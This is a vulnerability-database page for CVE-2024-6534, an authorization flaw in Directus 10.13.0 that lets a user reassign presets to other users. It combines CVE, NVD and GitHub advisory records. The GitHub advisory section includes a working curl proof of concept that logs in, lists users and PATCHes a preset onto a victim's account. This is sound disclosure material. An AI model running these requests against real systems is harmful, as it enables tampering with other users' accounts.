cvelistv5 - cve-2024-6534

CVE-2024-6534 (GCVE-0-2024-6534)

Vulnerability from cvelistv5 – Published: 2024-08-15 03:10 – Updated: 2025-05-19 18:13

Summary

Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets' request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.

Severity ?

4.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Assigner

Fluid Attacks

References

URL

Tags

	https://fluidattacks.com/advisories/capaldi	third-party-advisory
	https://directus.io/	product

Impacted products

	Vendor	Product	Version
	Directus	Directus	Affected: 10.13.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:monospace:directus:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "directus",
            "vendor": "monospace",
            "versions": [
              {
                "status": "affected",
                "version": "10.13.0"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-6534",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-15T14:09:09.537547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-15T14:11:40.435Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "product": "Directus",
          "vendor": "Directus",
          "versions": [
            {
              "status": "affected",
              "version": "10.13.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027\u003ccode\u003ePOST /presets\u0027\u003c/code\u003e\u0026nbsp;request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover."
            }
          ],
          "value": "Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-180",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-180 Exploiting Incorrectly Configured Access Control Security Levels"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639 Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-19T18:13:11.475Z",
        "orgId": "84fe0718-d6bb-4716-a7e8-81a6d1daa869",
        "shortName": "Fluid Attacks"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://fluidattacks.com/advisories/capaldi"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://directus.io/"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Directus 10.13.0 - Insecure object reference via PATH presets",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "84fe0718-d6bb-4716-a7e8-81a6d1daa869",
    "assignerShortName": "Fluid Attacks",
    "cveId": "CVE-2024-6534",
    "datePublished": "2024-08-15T03:10:46.778Z",
    "dateReserved": "2024-07-05T14:42:09.575Z",
    "dateUpdated": "2025-05-19T18:13:11.475Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:monospace:directus:10.13.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"59902E26-19CC-4A1A-9BB4-54C1EE864B96\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.\"}, {\"lang\": \"es\", \"value\": \" Directus v10.13.0 permite a un atacante externo autenticado modificar los ajustes preestablecidos creados por el mismo usuario para asignarlos a otro usuario. Esto es posible porque la aplicaci\\u00f3n solo valida el par\\u00e1metro de usuario en la solicitud \u0027POST /presets\u0027 pero no en la solicitud PATCH. Cuando se encadena con CVE-2024-6533, podr\\u00eda resultar en una apropiaci\\u00f3n de la cuenta.\"}]",
      "id": "CVE-2024-6534",
      "lastModified": "2024-08-19T18:17:15.110",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"help@fluidattacks.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N\", \"baseScore\": 4.1, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 1.4}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N\", \"baseScore\": 4.3, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 1.4}]}",
      "published": "2024-08-15T04:15:07.937",
      "references": "[{\"url\": \"https://directus.io/\", \"source\": \"help@fluidattacks.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://fluidattacks.com/advisories/capaldi\", \"source\": \"help@fluidattacks.com\", \"tags\": [\"Third Party Advisory\"]}]",
      "sourceIdentifier": "help@fluidattacks.com",
      "vulnStatus": "Analyzed",
      "weaknesses": "[{\"source\": \"help@fluidattacks.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-639\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-6534\",\"sourceIdentifier\":\"help@fluidattacks.com\",\"published\":\"2024-08-15T04:15:07.937\",\"lastModified\":\"2025-05-19T19:15:47.540\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.\"},{\"lang\":\"es\",\"value\":\" Directus v10.13.0 permite a un atacante externo autenticado modificar los ajustes preestablecidos creados por el mismo usuario para asignarlos a otro usuario. Esto es posible porque la aplicaci\u00f3n solo valida el par\u00e1metro de usuario en la solicitud \u0027POST /presets\u0027 pero no en la solicitud PATCH. Cuando se encadena con CVE-2024-6533, podr\u00eda resultar en una apropiaci\u00f3n de la cuenta.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"help@fluidattacks.com\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"help@fluidattacks.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-639\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:monospace:directus:10.13.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"59902E26-19CC-4A1A-9BB4-54C1EE864B96\"}]}]}],\"references\":[{\"url\":\"https://directus.io/\",\"source\":\"help@fluidattacks.com\",\"tags\":[\"Product\"]},{\"url\":\"https://fluidattacks.com/advisories/capaldi\",\"source\":\"help@fluidattacks.com\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-6534\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-15T14:09:09.537547Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:monospace:directus:*:*:*:*:*:*:*:*\"], \"vendor\": \"monospace\", \"product\": \"directus\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.13.0\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-15T14:11:22.029Z\"}}], \"cna\": {\"title\": \"Directus 10.13.0 - Insecure object reference via PATH presets\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"impacts\": [{\"capecId\": \"CAPEC-180\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-180 Exploiting Incorrectly Configured Access Control Security Levels\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Directus\", \"product\": \"Directus\", \"versions\": [{\"status\": \"affected\", \"version\": \"10.13.0\"}], \"defaultStatus\": \"unknown\"}], \"references\": [{\"url\": \"https://fluidattacks.com/advisories/capaldi\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"https://directus.io/\", \"tags\": [\"product\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027\u003ccode\u003ePOST /presets\u0027\u003c/code\u003e\u0026nbsp;request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-639\", \"description\": \"CWE-639 Authorization Bypass Through User-Controlled Key\"}]}], \"providerMetadata\": {\"orgId\": \"84fe0718-d6bb-4716-a7e8-81a6d1daa869\", \"shortName\": \"Fluid Attacks\", \"dateUpdated\": \"2025-05-19T18:13:11.475Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-6534\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-05-19T18:13:11.475Z\", \"dateReserved\": \"2024-07-05T14:42:09.575Z\", \"assignerOrgId\": \"84fe0718-d6bb-4716-a7e8-81a6d1daa869\", \"datePublished\": \"2024-08-15T03:10:46.778Z\", \"assignerShortName\": \"Fluid Attacks\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-3FFF-GQW3-VJ86

Vulnerability from github – Published: 2024-08-27 19:54 – Updated: 2025-03-20 18:36

Summary

Directus has an insecure object reference via PATH presets

Details

Impact

Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the POST /presets request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.

This vulnerability occurs because the application only validates the user parameter in the POST /presets request but not in the PATCH request.

PoC

To exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.

Create a preset for a collection.

Store the preset id, or use it if it already exists from GET /presets. The following example will use the direct_users preset.

TARGET_HOST="http://localhost:8055" ATTACKER_EMAIL="malicious@malicious.com" ATTACKER_PASSWORD="123456" root_dir=$(dirname $0) mkdir "${root_dir}/static" curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \ -c "${root_dir}/static/attacker_directus_session_token" \ -H 'Content-Type: application/json' \ -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}" attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id") # Store all user's id curl -s -k "${TARGET_HOST}/users" \ -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data[] | select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"

# Choose the victim user id from the previous request
victim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265"
users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \
  -H 'Content-Type: application/json' \
  -b "${root_dir}/static/attacker_directus_session_token" \
  --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"  | jq -r '.data.id')

Modify the presets via PATCH /presets/{id}.

With the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from GET /users. The following example modifies the title parameter.

curl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \
    -H 'Content-Type: application/json' \
    -b "${root_dir}/static/attacker_directus_session_token" \
    --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

Notes:

Each new preset to a specific collection will have an integer consecutive id independent of the user who created it.

The user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.

The app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.

When the victim visits the views of the modified presets, it will be rendered with the new configuration applied.

Severity ?

4.1 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.13.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "directus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-6534"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-27T19:54:29Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nDirectus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request. When chained with [CVE-2024-6533](https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw), it could result in account takeover.\n\nThis vulnerability occurs because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request.\n\n### PoC\nTo exploit this vulnerability, we need to do the follow steps using a non-administrative, default role attacker account.\n\n1. Create a preset for a collection.\n\nStore the preset id, or use it if it already exists from `GET /presets`. The following example will use the direct_users preset.\n\n```bash\nTARGET_HOST=\"http://localhost:8055\" ATTACKER_EMAIL=\"malicious@malicious.com\" ATTACKER_PASSWORD=\"123456\" root_dir=$(dirname $0) mkdir \"${root_dir}/static\" curl -s -k -o /dev/null -w \"%{http_code}\" -X \u0027POST\u0027 \"${TARGET_HOST}/auth/login\" \\ -c \"${root_dir}/static/attacker_directus_session_token\" \\ -H \u0027Content-Type: application/json\u0027 \\ -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\" attacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") # Store all user\u0027s id curl -s -k \"${TARGET_HOST}/users\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data[] | select(.id != \\\"${attacker_user_id}\\\")\" \u003e \"${root_dir}/static/users.json\"\n\n# Choose the victim user id from the previous request\nvictim_user_id=\"4f079119-2478-48c4-bd3a-30fa80c5f265\"\nusers_preset_id=$(curl -s -k -X \u0027POST\u0027 \"${TARGET_HOST}/presets\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b \"${root_dir}/static/attacker_directus_session_token\" \\\n  --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"{{tittle}}\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"  | jq -r \u0027.data.id\u0027)\n```\n\n2. Modify the presets via `PATCH /presets/{id}`.\n\nWith the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from `GET /users`. The following example modifies the title parameter.\n\n```bash\ncurl -i -s -k -X \u0027PATCH\u0027 \"${TARGET_HOST}/presets/${users_preset_id}\" \\\n    -H \u0027Content-Type: application/json\u0027 \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${victim_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"PoC Assign another users presets\\\",\\\"subtitle\\\":\\\"fakeemail@fake.com\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nNotes:\n\nEach new preset to a specific collection will have an integer consecutive id independent of the user who created it.\n\nThe user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.\n\nThe app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.\n\nWhen the victim visits the views of the modified presets, it will be rendered with the new configuration applied.",
  "id": "GHSA-3fff-gqw3-vj86",
  "modified": "2025-03-20T18:36:04Z",
  "published": "2024-08-27T19:54:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534"
    },
    {
      "type": "WEB",
      "url": "https://directus.io"
    },
    {
      "type": "WEB",
      "url": "https://fluidattacks.com/advisories/capaldi"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/directus/directus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Directus has an insecure object reference via PATH presets"
}

GHSA-Q83V-HQ3J-4PQ3

Vulnerability from github – Published: 2024-08-15 06:32 – Updated: 2025-03-20 18:34

Summary

Duplicate Advisory: Improper access control in Directus

Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-3fff-gqw3-vj86. This link is maintained to preserve external references.

Original Description

Severity ?

4.1 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "directus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "10.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-15T21:56:16Z",
    "nvd_published_at": "2024-08-15T04:15:07Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-3fff-gqw3-vj86. This link is maintained to preserve external references.\n\n## Original Description\nDirectus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.",
  "id": "GHSA-q83v-hq3j-4pq3",
  "modified": "2025-03-20T18:34:46Z",
  "published": "2024-08-15T06:32:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534"
    },
    {
      "type": "WEB",
      "url": "https://directus.io"
    },
    {
      "type": "WEB",
      "url": "https://fluidattacks.com/advisories/capaldi"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/directus/directus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: Improper access control in Directus",
  "withdrawn": "2025-03-20T18:34:46Z"
}

FKIE_CVE-2024-6534

Vulnerability from fkie_nvd - Published: 2024-08-15 04:15 - Updated: 2025-05-19 19:15

Severity ?

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Summary

References

	URL	Tags
	help@fluidattacks.com	https://directus.io/	Product
	help@fluidattacks.com	https://fluidattacks.com/advisories/capaldi	Third Party Advisory

Impacted products

	Vendor	Product	Version
	monospace	directus	10.13.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:monospace:directus:10.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "59902E26-19CC-4A1A-9BB4-54C1EE864B96",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the \u0027POST /presets\u0027\u00a0request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover."
    },
    {
      "lang": "es",
      "value": " Directus v10.13.0 permite a un atacante externo autenticado modificar los ajustes preestablecidos creados por el mismo usuario para asignarlos a otro usuario. Esto es posible porque la aplicaci\u00f3n solo valida el par\u00e1metro de usuario en la solicitud \u0027POST /presets\u0027 pero no en la solicitud PATCH. Cuando se encadena con CVE-2024-6533, podr\u00eda resultar en una apropiaci\u00f3n de la cuenta."
    }
  ],
  "id": "CVE-2024-6534",
  "lastModified": "2025-05-19T19:15:47.540",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "help@fluidattacks.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-08-15T04:15:07.937",
  "references": [
    {
      "source": "help@fluidattacks.com",
      "tags": [
        "Product"
      ],
      "url": "https://directus.io/"
    },
    {
      "source": "help@fluidattacks.com",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://fluidattacks.com/advisories/capaldi"
    }
  ],
  "sourceIdentifier": "help@fluidattacks.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        }
      ],
      "source": "help@fluidattacks.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
